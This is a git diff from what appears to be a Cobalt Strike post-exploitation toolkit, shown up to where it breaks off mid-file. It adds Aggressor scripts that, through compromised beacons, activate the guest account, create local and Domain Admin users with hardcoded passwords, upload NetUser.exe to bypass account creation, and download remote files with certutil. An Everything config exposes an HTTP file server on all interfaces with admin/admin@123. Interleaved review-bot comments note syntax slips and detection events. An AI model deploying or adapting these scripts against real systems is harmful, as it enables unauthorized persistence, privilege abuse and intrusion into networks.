-search_edit_font= -search_edit_font_size= -status_bar_font= -status_bar_font_size= -header_font= -header_font_size= -normal_background_color= -normal_foreground_color= -normal_bold= -highlighted_background_color= -highlighted_foreground_color= -highlighted_bold= -current_sort_background_color= -current_sort_foreground_color= -current_sort_bold= -current_sort_highlighted_background_color= -current_sort_highlighted_foreground_color= -current_sort_highlighted_bold= -selected_background_color= -selected_foreground_color= -selected_bold= -selected_highlighted_background_color= -selected_highlighted_foreground_color= -selected_highlighted_bold= -selected_inactive_background_color= -selected_inactive_foreground_color= -selected_inactive_bold= -selected_inactive_highlighted_background_color= -selected_inactive_highlighted_foreground_color= -selected_inactive_highlighted_bold= -drop_target_background_color= -drop_target_foreground_color= -drop_target_bold= -drop_target_highlighted_background_color= -drop_target_highlighted_foreground_color= -drop_target_highlighted_bold= -mouseover_background_color= -mouseover_foreground_color= -mouseover_bold= -mouseover_highlighted_background_color= -mouseover_highlighted_foreground_color= -mouseover_highlighted_bold= -mouseover_current_sort_background_color= -mouseover_current_sort_foreground_color= -mouseover_current_sort_bold= -mouseover_current_sort_highlighted_background_color= -mouseover_current_sort_highlighted_foreground_color= -mouseover_current_sort_highlighted_bold= -alternate_row_background_color= -alternate_row_foreground_color= -alternate_row_bold= -alternate_row_highlighted_background_color= -alternate_row_highlighted_foreground_color= -alternate_row_highlighted_bold= -current_sort_alternate_row_background_color= -current_sort_alternate_row_foreground_color= -current_sort_alternate_row_bold= -current_sort_alternate_row_highlighted_background_color= -current_sort_alternate_row_highlighted_foreground_color= 
-current_sort_alternate_row_highlighted_bold= -hot_background_color= -hot_foreground_color= -hot_bold= -hot_highlighted_background_color= -hot_highlighted_foreground_color= -hot_highlighted_bold= -selected_hot_background_color= -selected_hot_foreground_color= -selected_hot_bold= -selected_hot_highlighted_background_color= -selected_hot_highlighted_foreground_color= -selected_hot_highlighted_bold= -selected_inactive_hot_background_color= -selected_inactive_hot_foreground_color= -selected_inactive_hot_bold= -selected_inactive_hot_highlighted_background_color= -selected_inactive_hot_highlighted_foreground_color= -selected_inactive_hot_highlighted_bold= -thumbnail_mouseover_background_color= -thumbnail_mouseover_foreground_color= -thumbnail_mouseover_bold= -thumbnail_mouseover_highlighted_background_color= -thumbnail_mouseover_highlighted_foreground_color= -thumbnail_mouseover_highlighted_bold= +; Please make sure Everything is not running before modifying this file. +[Everything] +run_as_admin=1 +allow_http_server=1 +allow_etp_server=1 +window_x=198 +window_y=89 +window_wide=785 +window_high=650 +maximized=0 +minimized=0 +fullscreen=0 +ontop=0 +bring_into_view=1 +alpha=255 +match_whole_word=0 +match_path=0 +match_case=0 +match_diacritics=0 +match_regex=0 +view=0 +thumbnail_size=64 +thumbnail_fill=0 +min_thumbnail_size=32 +max_thumbnail_size=256 +medium_thumbnail_size=64 +large_thumbnail_size=128 +extra_large_thumbnail_size=256 +thumbnail_load_size=0 +thumbnail_overlay_icon=1 +shell_max_path=0 +allow_multiple_windows=0 +allow_multiple_instances=0 +run_in_background=1 +show_in_taskbar=1 +show_tray_icon=1 +minimize_to_tray=0 +toggle_window_from_tray_icon=0 +alternate_row_color=0 +show_mouseover=0 +check_for_updates_on_startup=0 +beta_updates=0 +show_highlighted_search_terms=1 +text_size=0 +hide_empty_search_results=0 +clear_selection_on_search=1 +show_focus_on_search=0 +new_window_key=0 +show_window_key=0 +toggle_window_key=0 +language=0 
+show_selected_item_in_statusbar=1 +statusbar_selected_item_format= +show_size_in_statusbar=0 +statusbar_size_format=0 +open_folder_command2= +open_file_command2= +open_path_command2= +explore_command2= +explore_path_command2= +window_title_format= +taskbar_notification_title_format= +instance_name= +translucent_selection_rectangle_alpha=70 +min_zoom=-6 +max_zoom=27 +context_menu_type=0 +context_menu_shell_extensions=1 +auto_include_fixed_volumes=1 +auto_include_removable_volumes=0 +auto_remove_offline_ntfs_volumes=1 +auto_remove_moved_ntfs_volumes=1 +auto_include_fixed_refs_volumes=1 +auto_include_removable_refs_volumes=0 +auto_remove_offline_refs_volumes=1 +auto_remove_moved_refs_volumes=1 +find_mount_points_on_removable_volumes=0 +last_export_type=0 +max_threads=0 +reuse_threads=1 +find_subfolders_and_files_max_threads=0 +single_parent_context_menu=0 +auto_size_1=512 +auto_size_2=640 +auto_size_3=768 +auto_size_aspect_ratio_x=9 +auto_size_aspect_ratio_y=7 +auto_size_width_only=0 +auto_size_path_x=1 +auto_size_path_y=2 +sticky_vscroll_bottom=1 +last_options_page=17 +draw_focus_rect=1 +date_format= +time_format= +listview_item_high=0 +single_click_open=0 +underline_icon_titles=0 +icons_only=0 +icon_shell_extensions=1 +auto_scroll_repeat_delay=250 +auto_scroll_repeat_rate=50 +open_many_files_warning_threshold=16 +set_foreground_window_attach_thread_input=0 +debug=0 +debug_log=0 +verbose=0 +lvm=1 +ipc=1 +home_match_case=0 +home_match_whole_word=0 +home_match_path=0 +home_match_diacritics=0 +home_regex=0 +home_search=1 +home_filter=0 +home_sort=0 +home_view=0 +home_index=1 +allow_multiple_windows_from_tray=0 +single_click_tray=0 +close_on_execute=0 +double_click_path=0 +update_display_after_scroll=0 +update_display_after_mask=1 +auto_scroll_view=0 +double_quote_copy_as_path=0 +snap=0 +snaplen=10 +rename_select_filepart_only=0 +rename_move_caret_to_selection_end=0 +rename_nav=0 +search_edit_move_caret_to_selection_end=0 +search_edit_drag_accept_files=0 
+select_search_on_mouse_click=1 +focus_search_on_activate=0 +reset_vscroll_on_search=1 +wrap_focus=0 +load_icon_priority=0 +load_thumbnail_priority=0 +load_fileinfo_priority=0 +always_request_all_fileinfo=0 +header_high=0 +hide_on_close=0 +max_hidden_windows=0x00000000 +winmm=0 +menu_escape_amp=1 +menu_folders=0 +menu_folder_separator= +menu_items_per_column=0 +new_inherit=1 +full_row_select=0 +tray_show_command_line= +dpi=96 +ctrl_mouse_wheel_action=1 +allow_open=1 +allow_context_menu=1 +allow_delete=1 +allow_rename=1 +allow_cut=1 +allow_copy=1 +allow_paste=1 +allow_drag_drop=1 +allow_window_message_filter_dragdrop=0 +auto_column_widths=0 +hotkey_explorer_path_search=0 +get_key_name_text=1 +paste_new_line_op=0 +esc_cancel_action=1 +fast_ascii_search=1 +match_path_when_search_contains_path_separator=1 +allow_literal_operators=0 +allow_round_bracket_parenthesis=0 +expand_environment_variables=0 +search_as_you_type=1 +always_update_query_on_search_parameter_change=0 +convert_forward_slash_to_backslash=0 +match_whole_filename_when_using_wildcards=1 +operator_precedence=0 +replace_exact_trailing_star_dot_star_with_star=1 +allow_exclamation_point_not=1 +search_command_prefix= +auto_complete_search_command=1 +double_buffer=1 +search= +show_number_of_results_with_selection=0 +date_descending_first=0 +size_descending_first=0 +size_format=2 +alpha_select=0 +tooltips=1 +listview_tooltips=1 +show_detailed_listview_tooltips=1 +rtl_listview_edit=0 +force_path_ltr_order=1 +force_path_left_align=1 +date_time_order=0 +date_time_align=1 +size_align=3 +invert_layout=0 +update_layout_on_input_language_change=0 +control_shift_action=3 +change_search_rtl_reading_action=3 +invert_layout_action=3 +bookmark_remember_case=1 +bookmark_remember_wholeword=1 +bookmark_remember_path=1 +bookmark_remember_diacritic=1 +bookmark_remember_regex=1 +bookmark_remember_sort=1 +bookmark_remember_view=1 +bookmark_remember_filter=1 +bookmark_remember_index=1 +bookmark_remember_search=1 
+bookmark_organize_x=0 +bookmark_organize_y=0 +bookmark_organize_wide=0 +bookmark_organize_high=0 +exclude_list_enabled=1 +exclude_hidden_files_and_folders=0 +exclude_system_files_and_folders=0 +include_only_files= +exclude_files= +db_location= +db_multi_user_filename=0 +db_compress=0 +index_size=1 +fast_size_sort=1 +index_date_created=0 +fast_date_created_sort=0 +index_date_modified=1 +fast_date_modified_sort=1 +index_date_accessed=0 +fast_date_accessed_sort=0 +index_attributes=0 +fast_attributes_sort=0 +index_folder_size=0 +fast_path_sort=1 +fast_extension_sort=0 +extended_information_cache_monitor=1 +db_update_thread_priority=-15 +index_recent_changes=1 +refs_file_id_extd_directory_info_buffer_size=0 +folder_update_thread_mode_background=0 +folder_update_rescan_asap=1 +monitor_thread_mode_background=1 +monitor_retry_delay=30000 +monitor_update_delay=1000 +monitor_pause=0 +usn_record_filter=0xffffffff +cancel_delay=0x000003e8 +allow_ntfs_open_file_by_id=1 +always_update_folder_recent_change=0 +editor_x=0 +editor_y=0 +editor_wide=0 +editor_high=0 +editor_maximized=0 +file_list_relative_paths=0 +rename_x=0 +rename_y=0 +rename_wide=0 +rename_high=0 +rename_match_case=0 +rename_regex=0 +advanced_copy_to_x=0 +advanced_copy_to_y=0 +advanced_copy_to_wide=0 +advanced_copy_to_high=0 +advanced_copy_to_match_case=0 +advanced_copy_to_regex=0 +advanced_move_to_x=0 +advanced_move_to_y=0 +advanced_move_to_wide=0 +advanced_move_to_high=0 +advanced_move_to_match_case=0 +advanced_move_to_regex=0 +advanced_search_x=0 +advanced_search_y=0 +advanced_search_wide=0 +advanced_search_high=0 +advanced_search_page_y_offset=0 +advanced_search_focus_id=0 +advanced_search_warnings=1 +max_recv_size=8388608 +display_full_path_name=0 +size_tiny=10240 +size_small=102400 +size_medium=1048576 +size_large=16777216 +size_huge=134217728 +themed_toolbar=1 +show_copy_name=2 +show_copy_path=2 +show_copy_full_name=2 +show_open_path=2 +show_explore=2 +show_explore_path=2 
+copy_path_folder_append_backslash=0 +custom_verb01= +custom_verb02= +custom_verb03= +custom_verb04= +custom_verb05= +custom_verb06= +custom_verb07= +custom_verb08= +custom_verb09= +custom_verb10= +custom_verb11= +custom_verb12= +filters_visible=0 +filters_wide=128 +filters_right_align=1 +filters_tab_stop=0 +filter= +filter_everything_name= +filter_organize_x=0 +filter_organize_y=0 +filter_organize_wide=0 +filter_organize_high=0 +preview_visible=0 +preview_x=640 +preview_tab_stop=0 +preview_mag_filter=0 +preview_min_filter=0 +preview_fill=0 +show_preview_handlers_in_preview_pane=0 +preview_load_size=0 +preview_context=0x00000000 +preview_release_handler_on_clear=0 +sort=Run Count +sort_ascending=0 +always_keep_sort=0 +index=0 +index_file_list= +index_etp_server= +index_link_type=1 +status_bar_visible=1 +select_search_on_focus_mode=1 +select_search_on_set_mode=2 +search_history_enabled=0 +run_history_enabled=1 +search_history_days_to_keep=90 +run_history_days_to_keep=90 +search_history_keep_forever=1 +run_history_keep_forever=1 +search_history_always_suggest=0 +search_history_always_suggest_extend_toolbar=0 +search_history_visible_count_max=12 +search_history_always_suggest_visible_count_max=1 +search_history_show_all_max=256 +search_history_suggestion_max=256 +search_history_show_all_sort=2 +search_history_suggestion_sort=1 +search_history_show_above=0 +search_history_sort=2 +search_history_sort_ascending=0 +search_history_x=0 +search_history_y=0 +search_history_wide=0 +search_history_high=0 +search_history_column_search_wide=208 +search_history_column_search_order=0 +search_history_column_count_wide=128 +search_history_column_count_order=1 +search_history_column_date_wide=128 +search_history_column_date_order=2 +etp_server_enabled=0 +etp_server_bindings= +etp_server_port=21 +etp_server_username= +etp_server_password= +etp_server_welcome_message= +etp_server_log_file_name= +etp_server_logging_enabled=0 +etp_server_log_max_size=4194304 
+etp_server_log_delta_size=524288 +etp_server_allow_file_download=1 +ftp_allow_port=1 +ftp_check_data_connection_ip=1 +http_server_enabled=1 +http_server_bindings=0.0.0.0 +http_title_format= +http_server_port=65535 +http_server_username=admin +http_server_password=admin@123 +http_server_home= +http_server_default_page= +http_server_log_file_name= +http_server_logging_enabled=0 +http_server_log_max_size=419430400 +http_server_log_delta_size=524288 +http_server_allow_file_download=1 +http_server_items_per_page=32 +http_server_show_drive_labels=0 +http_server_strings= +http_server_access_control_allow_origin= +service_pipe_name= +name_column_pos=0 +name_column_width=256 +path_column_visible=1 +path_column_pos=1 +path_column_width=256 +size_column_visible=1 +size_column_pos=2 +size_column_width=96 +extension_column_visible=0 +extension_column_pos=3 +extension_column_width=96 +type_column_visible=0 +type_column_pos=4 +type_column_width=96 +last_write_time_column_visible=1 +last_write_time_column_pos=3 +last_write_time_column_width=153 +creation_time_column_visible=0 +creation_time_column_pos=6 +creation_time_column_width=153 +date_accessed_column_visible=0 +date_accessed_column_pos=7 +date_accessed_column_width=153 +attribute_column_visible=0 +attribute_column_pos=8 +attribute_column_width=70 +date_recently_changed_column_visible=0 +date_recently_changed_column_pos=9 +date_recently_changed_column_width=153 +run_count_column_visible=0 +run_count_column_pos=10 +run_count_column_width=96 +date_run_column_visible=0 +date_run_column_pos=11 +date_run_column_width=153 +file_list_filename_column_visible=0 +file_list_filename_column_pos=12 +file_list_filename_column_width=96 +translucent_selection_rectangle_background_color= +translucent_selection_rectangle_border_color= +thumbnail_mouseover_border_color= +preview_background_color= +ntfs_volume_guids="\\\\?\\Volume{2d28957f-5c9e-11ea-88a5-806e6f6e6963}","\\\\?\\Volume{319a4f45-c20d-11ea-8074-806e6f6e6963}" 
+ntfs_volume_paths="C:","C:" +ntfs_volume_roots="","" +ntfs_volume_includes=1,1 +ntfs_volume_load_recent_changes=0,0 +ntfs_volume_include_onlys="","" +ntfs_volume_monitors=1,1 +refs_volume_guids= +refs_volume_paths= +refs_volume_roots= +refs_volume_includes= +refs_volume_load_recent_changes= +refs_volume_include_onlys= +refs_volume_monitors= +filelists= +filelist_monitor_changes= +folders= +folder_monitor_changes= +folder_buffer_size_list= +folder_rescan_if_full_list= +folder_update_types= +folder_update_days= +folder_update_ats= +folder_update_intervals= +folder_update_interval_types= +exclude_folders= +connect_history_hosts= +connect_history_ports= +connect_history_usernames= +connect_history_link_types= +etp_client_rewrite_patterns= +etp_client_rewrite_substitutions= +file_new_search_window_keys=334 +file_open_file_list_keys=335 +file_close_file_list_keys= +file_close_keys=343,27 +file_export_keys=339 +file_copy_full_name_to_clipboard_keys=9539 +file_copy_path_to_clipboard_keys= +file_set_run_count_keys= +file_create_shortcut_keys= +file_delete_keys=8238 +file_delete_permanently_keys=9262 +file_edit_keys= +file_open_keys=8205 +file_open_selection_and_close_everything_keys= +file_explore_path_keys= +file_open_new_keys= +file_open_path_keys=8461 +file_open_with_keys= +file_open_with_default_verb_keys= +file_play_keys= +file_preview_keys= +file_print_keys= +file_print_to_keys= +file_properties_keys=8717 +file_read_extended_information_keys=8517 +file_rename_keys=8305 +file_run_as_keys= +file_exit_keys=337 +file_copy_name_to_clipboard_keys= +file_open_selection_and_do_not_close_everything_keys= +file_open_most_run_keys= +file_open_last_run_keys= +file_custom_verb_1_keys= +file_custom_verb_2_keys= +file_custom_verb_3_keys= +file_custom_verb_4_keys= +file_custom_verb_5_keys= +file_custom_verb_6_keys= +file_custom_verb_7_keys= +file_custom_verb_8_keys= +file_custom_verb_9_keys= +file_custom_verb_10_keys= +file_custom_verb_11_keys= +file_custom_verb_12_keys= 
+indexes_folders_rescan_all_now_keys= +indexes_force_rebuild_keys= +edit_cut_keys=8536 +edit_copy_keys=8515,8493 +edit_paste_keys=8534,9261 +edit_select_all_keys=8513 +edit_invert_selection_keys= +edit_copy_to_folder_keys= +edit_move_to_folder_keys= +edit_advanced_advanced_copy_to_folder_keys= +edit_advanced_advanced_move_to_folder_keys= +view_filters_keys= +view_preview_keys=592 +view_status_bar_keys= +view_details_keys=1334 +view_medium_thumbnails_keys=1331 +view_large_thumbnails_keys=1330 +view_extra_large_thumbnails_keys=1329 +view_increase_thumbnail_size_keys=1467 +view_decrease_thumbnail_size_keys=1469 +view_window_size_small_keys=561 +view_window_size_medium_keys=562 +view_window_size_large_keys=563 +view_window_size_auto_fit_keys=564 +view_zoom_zoom_in_keys=443 +view_zoom_zoom_out_keys=445 +view_zoom_reset_keys=304,352 +view_go_to_back_keys=549,166 +view_go_to_forward_keys=551,167 +view_go_to_home_keys=548 +view_go_to_show_all_history_keys=1352,328 +view_sort_by_name_keys=305 +view_sort_by_path_keys=306 +view_sort_by_size_keys=307 +view_sort_by_extension_keys=308 +view_sort_by_type_keys=309 +view_sort_by_date_modified_keys=310 +view_sort_by_date_created_keys=311 +view_sort_by_attributes_keys=312 +view_sort_by_file_list_filename_keys= +view_sort_by_run_count_keys= +view_sort_by_date_run_keys= +view_sort_by_date_recently_changed_keys=313 +view_sort_by_date_accessed_keys= +view_sort_by_ascending_keys= +view_sort_by_descending_keys= +view_refresh_keys=116 +view_fullscreen_keys=122 +view_toggle_ltrrtl_direction_keys= +view_on_top_never_keys= +view_on_top_always_keys= +view_on_top_while_searching_keys= +search_match_case_keys=329 +search_match_whole_word_keys=322 +search_match_path_keys=341 +search_match_diacritics_keys=333 +search_enable_regex_keys=338 +search_advanced_search_keys= +search_add_to_filters_keys= +search_organize_filters_keys=1350 +bookmarks_add_to_bookmarks_keys=324 +bookmarks_organize_bookmarks_keys=1346 +tools_options_keys=336 
+tools_console_keys=448 +tools_file_list_editor_keys= +tools_connect_to_etp_server_keys= +tools_disconnect_from_etp_server_keys= +help_everything_help_keys=112 +help_search_syntax_keys= +help_regex_syntax_keys= +help_command_line_options_keys= +help_everything_website_keys= +help_check_for_updates_keys= +help_about_everything_keys=368 +help_donate_keys= +search_edit_focus_search_edit_keys=326,114,580 +search_edit_delete_previous_word_keys=4360 +search_edit_auto_complete_search_keys=4384 +search_edit_show_search_history_keys= +search_edit_show_all_search_history_keys=4646,4648 +result_list_item_up_keys=8230,4134 +result_list_item_down_keys=8232,4136 +result_list_page_up_keys=8225,4129 +result_list_page_down_keys=8226,4130 +result_list_start_of_list_keys=8228 +result_list_end_of_list_keys=8227 +result_list_item_up_extend_keys=9254,5158 +result_list_item_down_extend_keys=9256,5160 +result_list_page_up_extend_keys=9249,5153 +result_list_page_down_extend_keys=9250,5154 +result_list_start_of_list_extend_keys=9252 +result_list_end_of_list_extend_keys=9251 +result_list_focus_up_keys=8486,4390 +result_list_focus_down_keys=8488,4392 +result_list_focus_page_up_keys=8481,4385 +result_list_focus_page_down_keys=8482,4386 +result_list_focus_start_of_list_keys=8484 +result_list_focus_end_of_list_keys=8483 +result_list_focus_up_extend_keys=9510,5414 +result_list_focus_down_extend_keys=9512,5416 +result_list_focus_page_up_extend_keys=9505,5409 +result_list_focus_page_down_extend_keys=9506,5410 +result_list_focus_start_of_list_extend_keys=9508 +result_list_focus_end_of_list_extend_keys=9507 +result_list_focus_result_list_keys= +result_list_focus_highest_run_count_result_keys= +result_list_focus_last_run_result_keys= +result_list_toggle_path_column_keys= +result_list_toggle_size_column_keys= +result_list_toggle_extension_column_keys= +result_list_toggle_type_column_keys= +result_list_toggle_date_modified_column_keys= +result_list_toggle_date_created_column_keys= 
+result_list_toggle_attributes_column_keys= +result_list_toggle_file_list_filename_column_keys= +result_list_toggle_run_count_column_keys= +result_list_toggle_date_recently_changed_column_keys= +result_list_toggle_date_accessed_column_keys= +result_list_toggle_date_run_column_keys= +result_list_size_all_columns_to_fit_keys=8555 +result_list_size_result_list_to_fit_keys= +result_list_context_menu_keys=9337 +result_list_scroll_left_or_thumbnail_left_keys=8229 +result_list_scroll_right_or_thumbnail_right_keys=8231 +result_list_scroll_page_left_or_thumbnail_focus_left_keys=8485 +result_list_scroll_page_right_or_thumbnail_focus_right_keys=8487 +result_list_left_extend_keys=9253 +result_list_right_extend_keys=9255 +result_list_focus_left_extend_keys=9509 +result_list_focus_right_extend_keys=9511 +result_list_select_focus_keys=8224 +result_list_toggle_focus_selection_keys=8480 +result_list_copy_as_csv_keys= +preview_focus_preview_keys= +result_list_font= +result_list_font_size= +search_edit_font= +search_edit_font_size= +status_bar_font= +status_bar_font_size= +header_font= +header_font_size= +normal_background_color= +normal_foreground_color= +normal_bold= +highlighted_background_color= +highlighted_foreground_color= +highlighted_bold= +current_sort_background_color= +current_sort_foreground_color= +current_sort_bold= +current_sort_highlighted_background_color= +current_sort_highlighted_foreground_color= +current_sort_highlighted_bold= +selected_background_color= +selected_foreground_color= +selected_bold= +selected_highlighted_background_color= +selected_highlighted_foreground_color= +selected_highlighted_bold= +selected_inactive_background_color= +selected_inactive_foreground_color= +selected_inactive_bold= +selected_inactive_highlighted_background_color= +selected_inactive_highlighted_foreground_color= +selected_inactive_highlighted_bold= +drop_target_background_color= +drop_target_foreground_color= +drop_target_bold= +drop_target_highlighted_background_color= 
+drop_target_highlighted_foreground_color= +drop_target_highlighted_bold= +mouseover_background_color= +mouseover_foreground_color= +mouseover_bold= +mouseover_highlighted_background_color= +mouseover_highlighted_foreground_color= +mouseover_highlighted_bold= +mouseover_current_sort_background_color= +mouseover_current_sort_foreground_color= +mouseover_current_sort_bold= +mouseover_current_sort_highlighted_background_color= +mouseover_current_sort_highlighted_foreground_color= +mouseover_current_sort_highlighted_bold= +alternate_row_background_color= +alternate_row_foreground_color= +alternate_row_bold= +alternate_row_highlighted_background_color= +alternate_row_highlighted_foreground_color= +alternate_row_highlighted_bold= +current_sort_alternate_row_background_color= +current_sort_alternate_row_foreground_color= +current_sort_alternate_row_bold= +current_sort_alternate_row_highlighted_background_color= +current_sort_alternate_row_highlighted_foreground_color= +current_sort_alternate_row_highlighted_bold= +hot_background_color= +hot_foreground_color= +hot_bold= +hot_highlighted_background_color= +hot_highlighted_foreground_color= +hot_highlighted_bold= +selected_hot_background_color= +selected_hot_foreground_color= +selected_hot_bold= +selected_hot_highlighted_background_color= +selected_hot_highlighted_foreground_color= +selected_hot_highlighted_bold= +selected_inactive_hot_background_color= +selected_inactive_hot_foreground_color= +selected_inactive_hot_bold= +selected_inactive_hot_highlighted_background_color= +selected_inactive_hot_highlighted_foreground_color= +selected_inactive_hot_highlighted_bold= +thumbnail_mouseover_background_color= +thumbnail_mouseover_foreground_color= +thumbnail_mouseover_bold= +thumbnail_mouseover_highlighted_background_color= +thumbnail_mouseover_highlighted_foreground_color= +thumbnail_mouseover_highlighted_bold= 
diff --git a/scripts/Intranet agent/frpcx.exe b/Chinese/scripts/Intranet agent/frpcx.exe
similarity index 100%
rename from scripts/Intranet agent/frpcx.exe
rename to Chinese/scripts/Intranet agent/frpcx.exe
diff --git a/scripts/Intranet agent/iox.exe b/Chinese/scripts/Intranet agent/iox.exe
similarity index 100%
rename from scripts/Intranet agent/iox.exe
rename to Chinese/scripts/Intranet agent/iox.exe
diff --git a/scripts/Intranet agent/nb.exe b/Chinese/scripts/Intranet agent/nb.exe
similarity index 100%
rename from scripts/Intranet agent/nb.exe
rename to Chinese/scripts/Intranet agent/nb.exe
diff --git a/scripts/Intranet agent/npc.exe b/Chinese/scripts/Intranet agent/npc.exe
old mode 100755
new mode 100644
similarity index 100%
rename from scripts/Intranet agent/npc.exe
rename to Chinese/scripts/Intranet agent/npc.exe
diff --git a/scripts/Intranet scanning/SharpSpray.exe b/Chinese/scripts/Intranet scanning/SharpSpray.exe
similarity index 100%
rename from scripts/Intranet scanning/SharpSpray.exe
rename to Chinese/scripts/Intranet scanning/SharpSpray.exe
diff --git a/scripts/Intranet scanning/SharpWebScan.exe b/Chinese/scripts/Intranet scanning/SharpWebScan.exe
similarity index 100%
rename from scripts/Intranet scanning/SharpWebScan.exe
rename to Chinese/scripts/Intranet scanning/SharpWebScan.exe
diff --git a/scripts/Intranet scanning/TailorScan.exe b/Chinese/scripts/Intranet scanning/TailorScan.exe
old mode 100755
new mode 100644
similarity index 100%
rename from scripts/Intranet scanning/TailorScan.exe
rename to Chinese/scripts/Intranet scanning/TailorScan.exe
diff --git a/scripts/Intranet scanning/fscan.exe b/Chinese/scripts/Intranet scanning/fscan.exe
similarity index 100%
rename from scripts/Intranet scanning/fscan.exe
rename to Chinese/scripts/Intranet scanning/fscan.exe
diff --git a/scripts/Locate AD/PVEFindADUser.exe b/Chinese/scripts/Locate AD/PVEFindADUser.exe
old mode 100755
new mode 100644
similarity index 100%
rename from scripts/Locate AD/PVEFindADUser.exe
rename to Chinese/scripts/Locate AD/PVEFindADUser.exe
diff --git a/scripts/Locate AD/PsLoggedon.exe b/Chinese/scripts/Locate AD/PsLoggedon.exe
old mode 100755
new mode 100644
similarity index 100%
rename from scripts/Locate AD/PsLoggedon.exe
rename to Chinese/scripts/Locate AD/PsLoggedon.exe
diff --git a/scripts/Locate AD/netview.exe b/Chinese/scripts/Locate AD/netview.exe
old mode 100755
new mode 100644
similarity index 100%
rename from scripts/Locate AD/netview.exe
rename to Chinese/scripts/Locate AD/netview.exe
diff --git a/scripts/RDP/RegRdpPort.ps1 b/Chinese/scripts/RDP/RegRdpPort.ps1
similarity index 100%
rename from scripts/RDP/RegRdpPort.ps1
rename to Chinese/scripts/RDP/RegRdpPort.ps1
diff --git a/English/Z1.cna b/English/Z1.cna
new file mode 100644
index 0000000..fce4059
--- /dev/null
+++ b/English/Z1.cna
@@ -0,0 +1,14 @@
+popup beacon_bottom {
+ menu "Z1"{
+ include(script_resource("modules/Information collection.cna"));
+ include(script_resource("modules/RDP.cna"))
+ include(script_resource("modules/Add user.cna"))
+ include(script_resource("modules/Intranet agent.cna"));
+ include(script_resource("modules/Grab password.cna"));
+ include(script_resource("modules/Intranet scanning.cna"));
+ include(script_resource("modules/Locate AD.cna"));
+ include(script_resource("modules/Permission retention.cna"));
+ include(script_resource("modules/Auxiliary.cna"));
+ include(script_resource("modules/About.cna"));
+ }
+}
diff --git a/English/modules/About.cna b/English/modules/About.cna
new file mode 100644
index 0000000..e28e40b
--- /dev/null
+++ b/English/modules/About.cna
@@ -0,0 +1,4 @@
+menu "About" {
+ item("zjun", { url_open("https://www.zjun.info"); });
+ item("Project gallery", { url_open("https://github.com/z1un/Z1-AggressorScripts"); });
+}
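Review bot: The `include(...)` lines for `modules/RDP.cna` and `modules/Add user.cna` in the new `English/Z1.cna` have no terminating semicolon, while the other eight includes in the same menu do. Sleep statements are normally terminated with `;`, so these two lines are at best inconsistent and may fail to parse when the script is loaded; write them as `include(script_resource("modules/RDP.cna"));` and `include(script_resource("modules/Add user.cna"));`. The file also has no header comment; a one-line comment above `popup beacon_bottom` naming the modules the menu pulls in would help anyone auditing what the script loads.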
diff --git a/English/modules/Add user.cna b/English/modules/Add user.cna
new file mode 100644
index 0000000..17f666a
--- /dev/null
+++ b/English/modules/Add user.cna
@@ -0,0 +1,69 @@
+menu "Adding Users" {
+ item "Activate the guest user" {
+ $bid = $1['@'];
+ bshell($bid, "net user guest /active:yes");
+ }
+
+ item "Create an Admin User" {
+ $bid = $1['@'];
+ $Dialog = dialog("Add a local administrator user",%(username => "qax$", passwd => "Qianxin@123.", "groups" => "administrators", bid => $bid),&add_localuser);
+ dialog_description($Dialog, "Add a local administrator user,Pay attention to password complexity in account policies.");
+ drow_text($Dialog, "username", "username: ");
+ drow_text($Dialog, "passwd", "passwd: ");
+ drow_text($Dialog, "groups", "groups(administrators): ");
+ dbutton_action($Dialog, "Execute");
+ dialog_show($Dialog);
+ }
+ sub add_localuser{
+ local('$Name');
+ $Name = $3['username'];
+ $Pwd = $3['passwd'];
+ $groups = $3['groups'];
+ bshell($bid, "net user $Name $Pwd /add && net localgroup $groups $Name /add");
+ }
+
+ item "Adding a Domain Admin User"{
+ $bid = $1['@'];
+ $Dialog = dialog("Add Domain Admin",%(username => "qax$",passswd => "Qianxin@123.",bid => $bid),&add_domainuser);
+ dialog_description($Dialog, "Add a domain administrator user and pay attention to the password complexity in the account policy.");
+ drow_text($Dialog, "username", "username: ");
+ drow_text($Dialog, "passswd", "passswd: ");
+ dbutton_action($Dialog, "Execute");
+ dialog_show($Dialog);
+ }
+ sub add_domainuser{
+ local('$Name');
+ $Name = $3['username'];
+ $Pwd = $3['passswd'];
+ bshell($bid, "net user $Name $Pwd /add /domain && net group \"Domain Admins\" $Name /add /domain");
+ }
+
+
+# item "API add administrator user" {
+# $bid = $1['@'];
+# btask($bid, "username:admin,password:Admin@123.", "");
+# bexecute($bid, "/scripts/Add user/bof_net_user.o");
+# }
+
+ menu "bypass create admin user"{
+ item "Upload NetUser"{
+ local('$bid');
+ foreach $bid ($1){
+ bupload($1, script_resource("/scripts/Add user/NetUser.exe"));
+ blog($1, "Project gallery:https://github.com/lengjibo/NetUser")
+ }
+ }
+ item "ExecuteNetUser" {
+ $bid = $1['@'];
+ $dialog = dialog("NetUser", %(bid => $bid), &NetUser);
+ dialog_description($dialog, "After execution, an account is automatically added to the administrator group and the program is automatically deleted. User:test123 Pass:Test@#123");
+ dbutton_action($dialog, "Execute");
+ dialog_show($dialog);
+ }
+ sub NetUser{
+ bshell($bid, "NetUser.exe");
+ }
+ }
+
+
+}
diff --git a/English/modules/Auxiliary.cna b/English/modules/Auxiliary.cna
new file mode 100644
index 0000000..581ec90
--- /dev/null
+++ b/English/modules/Auxiliary.cna
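Review bot: The dialog defaults in "Create an Admin User" and "Adding a Domain Admin User" ship a fixed account name and password (`username => "qax$"`, `passwd => "Qianxin@123."`), and the "ExecuteNetUser" description states a fixed `test123` account, so any host where the defaults are accepted is left with a privileged account whose password is published in this repository. Leave the password default empty (`passwd => ""`) so a per-engagement value has to be typed, and add a comment above `menu "Adding Users"` saying that every created account must be recorded and removed when the test ends. The password is also interpolated into the `net user ... /add` command line, so it will appear wherever process command lines are logged; on the defensive side these actions surface as account-creation and group-membership events (Windows 4720, 4732, 4728). The domain dialog spells its key `passswd`, which works only because `add_domainuser` repeats the same spelling.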
@@ -0,0 +1,65 @@
+menu "Auxiliary module" {
+ item "certutil download file" {
+ $bid = $1['@'];
+ $dialog = dialog("certutil remote download", %(url => "http://xxxx", path => "C:\\Users\\Public\\a", bid => $bid), &certutil);
+ dialog_description($dialog, "certutil command remote file download.");
+ drow_text($dialog, "url", "Remote file address: ");
+ drow_text($dialog, "path", "Local storage location: ");
+ dbutton_action($dialog, "Run");
+ dialog_show($dialog);
+ }
+ sub certutil {
+ $url = $3['url'];
+ $path = $3['path'];
+ bshell($bid, "certutil.exe -urlcache -split -f $url $path");
+ }
+
+ item "vbs download file" {
+ $bid = $1['@'];
+ $dialog = dialog("vbs download file", %(url => "http://xxxx", path => "C:\\Users\\Public\\a", bid => $bid), &vbs);
